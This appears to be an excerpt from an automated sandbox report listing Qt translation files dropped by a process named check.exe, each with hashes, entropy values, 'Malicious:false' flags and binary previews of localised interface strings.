                                                                                                                                                                                                            SSDEEP:192:TO/7kBL9wGu3wtCnlhLJUBB7oph+mZ18LgP:T8QnwcCnlhdvphpZ18LgP
                                                                                                                                                                                                            MD5:2B68446B69D9AA40B273D75A581D2992
                                                                                                                                                                                                            SHA1:8A09BD38998543B74E2673478EDD54FB4BBDD068
                                                                                                                                                                                                            SHA-256:CC6CB4D8C54086224672F2E49E623C8CB7C0C1CD65B8D5ECD42FC9BA3A6065BD
                                                                                                                                                                                                            SHA-512:F3A3D6A416B3411613B06FC3EE56625D4D4DE80087182AB0D0601E49314861ABEF97D11A15B4C0511911544A59FBC4A4A52F0CCF0FD43F763A76A8922D8E57B6
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......plB.....(.......0T....T.5w......Uj... R.`.......a[...............t............2.39....H......6.......n.B<s.. ...M^..._......6.O5^...F..)^......o>...............t.....D ......k.N.....k.N.../...n.......I...W..........2>...w................G.......w............&.......:..,................^...(..... ..$a....?.6.>...$..........K......W.b....._Xn......GN...Y..~......!.....*.K.H...E....."...pN...-.........P.~...}.o........(....1..~......s.>......%c.."..o.....r.z.q............................h................e.....i..#.......N.i.e.n.a.z.w.a.n.y..........Untitled.....QHelp.....P.N.i.e. .m.o.|.n.a. .s.k.o.p.i.o.w.a... .p.l.i.k.u. .z. .k.o.l.e.k.c.j...:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....>.N.i.e. .m.o.|.n.a. .u.t.w.o.r.z.y... .k.a.t.a.l.o.g.u.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....H.N.i.e. .m.o.|.n.a. .u.t.w.o.r.z.y... .t.a.b.e.l. .w. .p.l.i.k.u. .%.1........... Cannot create tables in file
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7288
                                                                                                                                                                                                            Entropy (8bit):5.297177914619657
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:dBJjvfq7D6X68uBAzlp5W9+yBPZZZMM7vL0PXJL:JKrMEL0PXJL
                                                                                                                                                                                                            MD5:794AF445A5D7082D51BD22683449F86D
                                                                                                                                                                                                            SHA1:3A0C369872B112A1572AA17EEB814B168B225D98
                                                                                                                                                                                                            SHA-256:557B644E6DA5F1EC720EF93965617087E4D1F40B2494CC5AA524CF3796108DE7
                                                                                                                                                                                                            SHA-512:D42C870A16AEE7626BBE24886AD423895529A2F1A51AC2DBC303BC0E4EF9D3241FE894ECA3F7217AD408C8DCEE165CA4B89D84570357B0EB80340A3F72B0A846
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......ruB..........\.%.......0T......K:^.....Uj....L.`........YJ...X.E.4...............>............B<s.....B\>............+.s.....zq.......9....B..vR...L..@.......@....G..:......8Z......g.N......F....>...........t.....D ....R.k.N...E...I...W..^......`#....s..2.......G....^...N.........................K.......d..K............O..GN...b..NO.............K.H.............pN...P..V....................g..........>.............~........%c.....z.q....i........$...>.1.0.2.;.5.=.8.5. .D.8.;.L.B.@.0..........Add Filter.....FilterNameDialogClass.........<.O. .D.8.;.L.B.@.0.:..........Filter Name:.....FilterNameDialogClass.........5.7.K.<.O.=.=.K.9..........Untitled.....QHelp.....b...5. .C.4.0.;.>.A.L. .A.:.>.?.8.@.>.2.0.B.L. .D.0.9.;. .:.>.;.;.5.:.F.8.8. .A.?.@.0.2.:.8.:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....<...5. .C.4.0.;.>.A.L. .A.>.7.4.0.B.L. .:.0.B.0.;.>.3.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....`
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10388
                                                                                                                                                                                                            Entropy (8bit):4.70568613551943
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:uPq7iBWseXKkVu4+Qv9zEJ1xGMaLNmBgJqdC6/MxIMt:LWcseV04Xv9zEoLNDJqdX/MxRt
                                                                                                                                                                                                            MD5:75C94E59F1FC5312AE25381C247AF992
                                                                                                                                                                                                            SHA1:E3E5F4582CC5FAFE6DF43644D11484861023C084
                                                                                                                                                                                                            SHA-256:F41E33E1D790BD0D3EB180F1F875BC191FE74773628F25C2CAD95E1402E66867
                                                                                                                                                                                                            SHA-512:959B8F4D57FC9728DD4804322333D1792D45A0EE85615B559E0CA3BD2DEA22E2C8C68C6482AE9425D29C819B0ED27473EDDC82EF4B6ECFFB2E2E7B56E1509B63
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......sk_SKB...8.(.......0T......Uj......`.....0.a[....8..........t..............1"......39.......s........... .....%..........B<s...6..MQ..............J..$-.0.......O5Q......)Q...;..o>...........G...J..$......."....t.....8dz..#..D ......k.A...2.k.A.......n..._...I.................. ...21..........e.........G...!...w....Y...........!...........=...Q............$a......6.>.........."...K....i......# ._Xa..."..GA..............~.......TH..!{.K.H.."7.........pA..........%..P.~.....o........(..........!...~....u.s.1.....o.......z.q...c..............................f..e....9i..&-......(.D...v.o.d.o.m. .m...~.e. .b.y.e. .t.o.,. .~.e. .d.o.k.u.m.e.n.t...c.i.a. .s.t...l.e. .n.i.e. .j.e. .z.i.n.d.e.x.o.v.a.n.....).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......P.o.z.n...m.k.a.:..........Note:.....QCLuceneResultWidget.....".V...s.l.e.d.k.y. .h.>.a.d.a.n.i.a..........Search Results.....QCLuceneResultWidg
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10363
                                                                                                                                                                                                            Entropy (8bit):4.613473842638716
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:vNBqTi7qBCVIQf54EslZ2Jy/L/BnmpP0bX3caK6q1B6/hgIlCCUb0:vjq2+UVT4ESZOYmpP0bX26q1I/yqCCUw
                                                                                                                                                                                                            MD5:3B0AEE27B193A8A563C5CB5C7C4FE60F
                                                                                                                                                                                                            SHA1:C94E832595EC765370553468F87C02DB7E7D138A
                                                                                                                                                                                                            SHA-256:2EC955E662407EBCD8DCDAE5AAA21E4108E0B5B0AEE0E9DB712C27072943535F
                                                                                                                                                                                                            SHA-512:EBC25C378126876F44279E23CA0CF06FC9E7D5F51AD7E3DBDABA7A50C81112EDC1C76F7FD0AF47E447A93C3593BB953A0C9C1FBBFC49494E6B29BF21655F690E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......slB...8.(.....E.0T......Uj......`.......a[............!..t..............1"....;.39.......s....^............$........i.B<s...,..MQ..........}...J..#..0.....Z.O5Q...[..)Q......o>...............J..$I......"W...t...C.8dz..#H.D ......k.A.....k.A.......n.......I.................. P..21....................G...!...w............?...!...3...........Q...+........$a....>.6.>.........."...K...........".._Xa......GA..............~....A..TH..!I.K.H..!..........pA...>......%..P.~...>.o........(....d..... ...~......s.1.....o.......z.q.....................................e....{i..&.....z.(.R.a.z.l.o.g. .j.e. .m.o.r.d.a. .t.o.,. .d.a. .s.e. .d.o.k.u.m.e.n.t.a.c.i.j.o. .a.e. .v.e.d.n.o. .i.n.d.e.k.s.i.r.a...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......O.p.o.m.b.a.:..........Note:.....QCLuceneResultWidget.....".R.e.z.u.l.t.a.t.i. .i.s.k.a.n.j.a..........Search Results.....QCLuceneResultWidget.......R.e.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4629
                                                                                                                                                                                                            Entropy (8bit):4.68793836539357
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:BoiK0UD2wMLb7Lqlguotqbww5BLNwWjK0kHU9zuQlUVUfniqthweEIFwC18lLEGA:PXFf7pU75BWWOpcJcVqDFNz8brgyf76r
                                                                                                                                                                                                            MD5:32D6EE3D8EE6408A03E568B972F93BCB
                                                                                                                                                                                                            SHA1:582EE079DBD42000C378E0701D26405750524DBA
                                                                                                                                                                                                            SHA-256:EBDECA0CFEE7A9441DEB800BABFD97C63BC4E421DA885C55B3BD49725EBACD25
                                                                                                                                                                                                            SHA-512:24AAA30B9CB4DB82A57411FBA24A87D70D8B845AE48A6FDA633D0BE6B824B58FDD2F450C2B385F16F49E2F9C6FA0A3124FD0F28594726940F996C66F8F3216CC
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......tr_TRB.....%.....[.0T......Uj......`.....$..............L.B<s.....B\>..........4.+.s...............t.....D ......k.N...5...I......2.......G....5...N..........a...............f..K....9..........GN...........@.K.H..........q..pN...t..........>...z.~...../..%c.....z.q....i..........B.a._.l.1.k.s.1.z..........Untitled.....QHelp.....J.K.o.l.e.k.s.i.y.o.n. .d.o.s.y.a.s.1. .k.o.p.y.a.l.a.n.a.m.1.y.o.r.:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....2.D.i.z.i.n. .o.l.u._.t.u.r.u.l.a.m.1.y.o.r.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....\.%.1. .d.o.s.y.a.s.1.n.d.a. .d.i.z.i.n. .t.a.b.l.o.l.a.r.1. .o.l.u._.t.u.r.u.l.a.m.1.y.o.r...........&Cannot create index tables in file %1......QHelpCollectionHandler.....N.%.1. .d.o.s.y.a.s.1.n.d.a. .t.a.b.l.o.l.a.r. .o.l.u._.t.u.r.u.l.a.m.1.y.o.r........... Cannot create tables in file %1......QHelpCollectionHandler.....P.S.q.l.i.t.e. .v.e.r.i.t.a.b.a.n.1. .s...r...c...
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):9750
                                                                                                                                                                                                            Entropy (8bit):5.281035122342072
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:eMp79BCN+u8hhbHbny+HJouHgei50JBSfDvbetpP/RIkT:eIhgNgBbny+phiS3SfDDetpP/RRT
                                                                                                                                                                                                            MD5:90A776917D534B65942063C319573CDC
                                                                                                                                                                                                            SHA1:5DF3B213D985A3BBDB476B37B7780D7D7DF17E41
                                                                                                                                                                                                            SHA-256:497CFC473684692EE44D7A3795E8FB2270C57069FD9EB98A615DD29AB9BE8A7C
                                                                                                                                                                                                            SHA-512:B34A019716B50CE8E1E20AC32756B3B0D5802971F7A04F4BDDE2418DA551AFB9742B79E934979DB6FAB9DAC05D7D26A3B19ABA77158321F8D9AAB08AEBBD455A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......uk_UAB...(.(.....?.0T......5w......Uj......`.......a[...............t............K.39....u....."..........B<s...8..M^...j......y...J..!..O5^...Y..)^......o>...o...J..":...... <...t...E.8dz..!3.D ....".k.N.....k.N...d...n.......I..............2>...>......o.........G.......w............E.......e..,................^...S........$a......6.>...'...... y..K........... ..W.b....._Xn......GN...p..~.......TH...4.!.....9.K.H.............pN..........#].P.~...~.o.....N..(....b.........~......s.>.....o.....o.z.q..........................U.h.............D..e.....i..#.......(...@.8.G.8.=.>.N. .F.L.>.3.>. .<.>.6.5. .1.C.B.8. .B.5.,. .I.>. .4.>.:.C.<.5.=.B.0.F.V.O. .4.>.A.V. .V.=.4.5.:.A.C.T.B.L.A.O...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.........@.8.<.V.B.:.0.:..........Note:.....QCLuceneResultWidget.....". .5.7.C.;.L.B.0.B.8. .?.>.H.C.:.C..........Search Results.....QCLuceneResultWidget....... .5.7
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6441
                                                                                                                                                                                                            Entropy (8bit):5.790303416386852
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:pB37nBD4H5PCyLDxLSzJPduYx9vja/FIgH9yIFqfs:rTZ4HUAD1S1JFe/F59PFqfs
                                                                                                                                                                                                            MD5:9297A6905B8B1823BF7E318D9138A104
                                                                                                                                                                                                            SHA1:3DB992A1B3BBCAF314B7EA4A000D6334D7492A52
                                                                                                                                                                                                            SHA-256:C02AAA20923F18ADDAB520BE5CB84EFD4C723396BDC24B4C9A72D406F101C7B4
                                                                                                                                                                                                            SHA-512:01F12CEE0AE456D78942A6049E1C77F94B406C8FFB4A5944DE15E54D1C760CDBA13279530A8F29B1443D1BBC647D3AF5436AAD8C43EB3944316C48300B3827E4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......zhB......I....L.0T......Uj......`.......a[...............t....P..@....Z.......<.........39.......s....2.................B<s......MQ..........9...J......31.....0.......O5Q......)Q...^..o>...........(...........J...V...........t.....8dz.....D ....Z.k.A.....k.A.......n.......I...........t..w................!...........o.......D...Q...E........$a......6.>...h...............%._Xa......GA..........._..TH...r.........pA.............P.~.....o.....].~.q.............~......o.....h.z.q...........H..0q....................i........2..S.u...y.`.Q.v.S.V.S..f/V.N:..e.hckcW(..}"_.0............M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget......l..............Note:.....QCLuceneResultWidget......d.}"~.g...........Search Results.....QCLuceneResultWidget.....,d.}"~.g.N_..^vN.[.et..V.N:..e.hckcW(..}"_............VThe search results may not be complete since the documentation is still being indexed!.....QCLuceneResultWidget..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):9301
                                                                                                                                                                                                            Entropy (8bit):5.80411750798786
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:4bgIXwsL78BQp4dRDP0ludqODa/wkB/tTWn5dJ6mO8IZiT9Dzz/wI3HyRWqUqS:lI/oS4dR5c/tTWn5/EZA9D/w+H8WqUqS
                                                                                                                                                                                                            MD5:47C3328D3918CF627112BB6C50E30B86
                                                                                                                                                                                                            SHA1:05705603AB3F28402A6C103E1C41DDFF21D140C0
                                                                                                                                                                                                            SHA-256:3697F1660D7F2AC9B37AC33CD1C7ECAE08ADBD26710E7E0076497CCDDC8BC830
                                                                                                                                                                                                            SHA-512:8DE1C3C5A48965CF6D8AA545DA9F0A5C00AE124F3E4153597915E7C0F4CAE1E26723270F58A47AA9FFA4AAF30E6EBA522D4EBAD27DECF17EF108E353E611980E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......zh_TWB......I....[.%.......0T......0T......Uj......Uj....R.`.....>.a[....................g..t....7..@......................39.......s................... .........B<s.....B<s.....B\>......MQ..........[...J...]..31.....+.s...c.0.....U.O5Q......)Q...C..o>.......................J...............t...3...t.....8dz.....D ....R.D ......k.A.....k.A.....k.N...'...n.......I.......I...........[..2....x..G........N......w................!...........:...........Q...&...............$a......6.>...I.......L.......$..K......................_Xa...y..GA...O..GN...........$..........TH...I.K.H................ Y..pA...K..pN.............P.~.....o.....D.~.q......>.............~......~........%c.. ..o.....!.z.q...........#..0q....................i..!Y....(..g.S..f/V.p.N.W(^.z.e.N.v.}"_.uvN-0............M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget......P..;............Note:.....QCLuceneResultWidget......d.\.}Pg...........Sea
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):146
                                                                                                                                                                                                            Entropy (8bit):3.6255640074603277
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/IrLlAlHekfK/gp1MUXaMlI+rwtbWlMiayIPldkOgn:CwDrC+TYIUrIRt6HoiHn
                                                                                                                                                                                                            MD5:5A46979B45C67DD6312F33CCEA2ED7BC
                                                                                                                                                                                                            SHA1:4C56836B1FB10D9903B299CBCB925947D515B4C8
                                                                                                                                                                                                            SHA-256:BB246AABD501E14CED8B1FFC1369E3D5D26567AAE62B3EAD4D94C22FB77C3471
                                                                                                                                                                                                            SHA-512:BDBA4E1731CF254E95B0F1337410937C765E96FBB1D42F1D053033E1511FEE6F50C02705F781F4DAA0347E2299DC78A5A9942AC4EA343ED1F8F401F9ACD961E4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......hu....v.....q.t.b.a.s.e._.h.u.....q.t.s.c.r.i.p.t._.h.u.....q.t.m.u.l.t.i.m.e.d.i.a._.h.u... .q.t.x.m.l.p.a.t.t.e.r.n.s._.h.u
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):153
                                                                                                                                                                                                            Entropy (8bit):3.5752972123113778
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/EbFlAlHeke5zOp1MUWLt7KlI+rwtbWlMj5FKIPldkOA9kk:CwDM+35aIUW5SIRt6Q50oi9Gk
                                                                                                                                                                                                            MD5:2BB8C94D420D3BC344C79A01043BDC89
                                                                                                                                                                                                            SHA1:3FBA773D58E6D3699C20AB41AEE6801E71E2DDAE
                                                                                                                                                                                                            SHA-256:9117AAC2D07BC86DFA55A29B8825ED27C7093300FCC90E143E135E00E85F09D7
                                                                                                                                                                                                            SHA-512:C6B13655AFB206B0056F5656B4A9BF33CC267FCC928F6973258131CFA6443970510226FE45A041E5AA988809E17D0B11C7458F4A241C71521EDED186596C6055
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......it....v.....q.t.b.a.s.e._.i.t.....q.t.s.c.r.i.p.t._.i.t.....q.t.m.u.l.t.i.m.e.d.i.a._.i.t... .q.t.x.m.l.p.a.t.t.e.r.n.s._.i.t.......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):146
                                                                                                                                                                                                            Entropy (8bit):3.599979504080125
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/il/lAlHekd6hY1MUV6JAlI+rwtbWlMgel3UlIPldkOG:Cwz4+pjUGAIRt6qVUloiB
                                                                                                                                                                                                            MD5:8A1EE3433304838CCD0EBE0A825E84D8
                                                                                                                                                                                                            SHA1:2B3476588350C5384E0F9A51FF2E3659E89B4846
                                                                                                                                                                                                            SHA-256:23457CE8E44E233C6F85D56A4EE6A2CECD87C9C7BDDE6D8B8A925902EED1CD9C
                                                                                                                                                                                                            SHA-512:2D8ACD668DF537E98B27161F9FA49828EB2EB6E9CF41DB38E7F5D31F610D150CD1B580A8AE9B472A4DFDE4D4BF983C24A56293BB911CF5879368664E4D4CF3D2
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......ja....v.....q.t.b.a.s.e._.j.a.....q.t.s.c.r.i.p.t._.j.a.....q.t.m.u.l.t.i.m.e.d.i.a._.j.a... .q.t.x.m.l.p.a.t.t.e.r.n.s._.j.a
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):146
                                                                                                                                                                                                            Entropy (8bit):3.652277257665055
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/rrr/lAlHekcQ/01MUUQMlI+rwtbWlMhQGlIPldkORn:CwCC+1Q/UUpIRt6SBloimn
                                                                                                                                                                                                            MD5:7B2659AF52B824EAC6C169CDD9467EE9
                                                                                                                                                                                                            SHA1:5727109218B222E3B654A8CC9933E970EB7C2118
                                                                                                                                                                                                            SHA-256:4CC1AF37E771F0A43898849CFF2CD42A820451B8D2B2E88931031629D781DB05
                                                                                                                                                                                                            SHA-512:E9475AC80BDBBEFF54F2724A2B6BA76992F18FD1913FD8EE1540A99FD7A112B79FED5A130B6AC6D7460E4420C06354FC6E4CF7770A7C6CBD3EAC1BDAF0082DE5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......ko....v.....q.t.b.a.s.e._.k.o.....q.t.s.c.r.i.p.t._.k.o.....q.t.m.u.l.t.i.m.e.d.i.a._.k.o... .q.t.x.m.l.p.a.t.t.e.r.n.s._.k.o
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):165383
                                                                                                                                                                                                            Entropy (8bit):4.805977227348512
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:i5v3+zmayloj6yJjhnBAbnrKnGrhA7WgdXclIsooY9i:SvOzAloj6yJ9BA7riGr+7WKXc+s5ui
                                                                                                                                                                                                            MD5:8992B652D1499F5D2F12674F3F875A35
                                                                                                                                                                                                            SHA1:E22766A49612F79156C550D83C6C230345DDA433
                                                                                                                                                                                                            SHA-256:47EB5F97467DF769261421D54A5BEA1131C9FB9B6388791D38BB6574335B64BF
                                                                                                                                                                                                            SHA-512:9B8B6DBFF432F2A46C14BC183A6BAF84ACBF02BF2C5BB8C306C6538FBD9BE1C0A9015BD46728F2F652F9163AFC56B1E16D16EB95D8F7728F3C562AE9F4F1AE1E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......ltB..0X...*..)C...+...|......P....@..9....A..9....B..:....C..:....D..;....E..;....F..<6...G..<....H..=)...I..=....P..>q...Q..>....R..?....S..@f...T..@....U..A\...V..B....W..B....X..C....Y..Cy...]..k....t..........t>......th......t.......pd...;..J'...;.._h...;.......;...{...;..J....;...)...M..l....O...R...O...............}..l9...m..lo......^S..(5..P{..+;..4...+;......+;......+O..4...+O......1...^...E@..?p..F...C...H4......HY......H.......I...D...I@..s...IA..t...IC...2..J.......J....Y..J.......J.......K...9...LD...`..L.......PS......R.......T...q...Zr...`..[`......[`..&@..\....e..\....b.._......._....P..1........E..........5........L..1...O...1...PP......7......../...........$.......$.......,.......y.......y..........K^..............x......8................L...E.......E.......E..*....................%..:....%.........0U.....W......Zo.....^....5.......0..I....0...F...0...|...0.......0.......0..+\...5...}.......... D...g.. D......+....j..,.......,.......<U...+..<U
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):89
                                                                                                                                                                                                            Entropy (8bit):4.156834975253888
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/HzllldQlHekbxplUp1MUTJ+b:Cwv+DIUEb
                                                                                                                                                                                                            MD5:19F1B919BB531E9E12E7F707BEBD8497
                                                                                                                                                                                                            SHA1:46E82683CEA28D877C73A5CE02F965BB1130FC62
                                                                                                                                                                                                            SHA-256:03467738042A15676E504BA02CB326DCDB773B171FADA3CD62B7A0E0564314A0
                                                                                                                                                                                                            SHA-512:901D7B26CAC7A4D0FFDB39A1D25767B5BC71BED4AFBE788D70BF19D4C58A8295167111675AB45E743FDF4768AF874D69417414C01CF23D5C525A3F6C8BF7D21F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......lv....0.....q.t.b.a.s.e._.l.v.....q.t.s.c.r.i.p.t._.l.v........)....
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):161
                                                                                                                                                                                                            Entropy (8bit):3.8693516202048612
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/5J/p/lAlHekHp/7KlI+rwtbWlM6Tl/z21MUPp/FOlIPldkOjehB:Cwr+26IRt6nFURkloiT
                                                                                                                                                                                                            MD5:D71EA9FEFD97464B178235150EC8759E
                                                                                                                                                                                                            SHA1:61026FE602FD1B8B442A0D341C6BD759EEC75488
                                                                                                                                                                                                            SHA-256:BD7DD0C2CAB119A973DC10C3BFF7499D9728B928B541F86056921B30C8DB78E6
                                                                                                                                                                                                            SHA-512:ECD76A7D8B8D733E635B2BFEA90A4CD387B83D9D8A4EB6D299F59FF22AAA8D617A4C886A825A1CDDD901925C7839E2C18BDD4E0CD84152641922B66B62663F77
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......pl....v.....q.t.b.a.s.e._.p.l.....q.t.m.u.l.t.i.m.e.d.i.a._.p.l.....q.t.s.c.r.i.p.t._.p.l... .q.t.x.m.l.p.a.t.t.e.r.n.s._.p.l............,..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):70334
                                                                                                                                                                                                            Entropy (8bit):4.732724622610353
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:OKGUuWW+WHjS0gMBd483+Y7bDPs4RHBloLUIltlzAJnx4nnliM1OPlOibLG:JGUuWPuSgm0Jn+n4Mhj
                                                                                                                                                                                                            MD5:6656500F7A28EF820AE9F97FD47FB5BB
                                                                                                                                                                                                            SHA1:CC112B9C9513BCF7497F3417168B4C8A9F7640A9
                                                                                                                                                                                                            SHA-256:2C1E7BBF5168A64B43752DD4C547601C0BDE6D610F8671FA3E3AF38597E84783
                                                                                                                                                                                                            SHA-512:5C3CBFCF86AF6B4D949C1D914CD379E512E73BA350AF661033A386EE7FB981FBFCB43D9A35FDE7656E17BB09F64F1469F84867A780573C3359D645269461D5A6
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......pt_PTB...(...*...9...+...e...]..6....;.......;..-....;..;`...;..};...;.......M..6....O... ...O...w...........}..7....m..7B..........+;......+;..8S..+;..>...+O......+O..8#..H4......H.......J......K.......LD...)..L....}..PS...l..Zr...B..[`...;..[`.....\...kU.._......._.......1...?...............8...............E............,..................p........0...............v...........%...O...%..G........4...0.......0..:....0..y....0..|....0.......0...X...5.......5...... D..=... D..Kn..+....L..,...>...,......<U..z...<U......<.......F...>...F.......H5...4..H5..=...H5..K...H5......f....p..f...1...f...;...f...I...f...|H..f.......f.......l....................b......<...............>.......L ...........`......`..._.......A......2....e...g...e..>D...e..LW................y...,.*.y.....*.y..o..*.y.....*.T..L..*.0..'..*.0....+F...y..+F......+f......+f...C..+.z..0..+.....d.+....p0.+.....R.+.z..0U.+.....u.+....8..+....Ct.+....L..+....y..+.....Z.+......+...pc.+.....+....0..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):164
                                                                                                                                                                                                            Entropy (8bit):3.984562388316898
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/oZlAlHekF8Op1MUNKJKlI+rwtbWlM4KKIPldkOSxRMugB:CwY+GIUgcIRt61oihM3
                                                                                                                                                                                                            MD5:F7A8C75408B9A34A2B185E76F51B7B85
                                                                                                                                                                                                            SHA1:065E987139C5FB809A6F9CDF3845BCD79707FDBB
                                                                                                                                                                                                            SHA-256:6492B267608C6FB76907BD8FCFC8F1EF57E9F4EBBC2E81ACA81715A88388F94A
                                                                                                                                                                                                            SHA-512:E768C5B438EC899801B22B1325F2244ACCC5E7C2EC5D270F510BC3CBC2D9A0536949C026DB7FB5862835E506A9F2020DEB2CC4001E7011FF974324542734F855
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
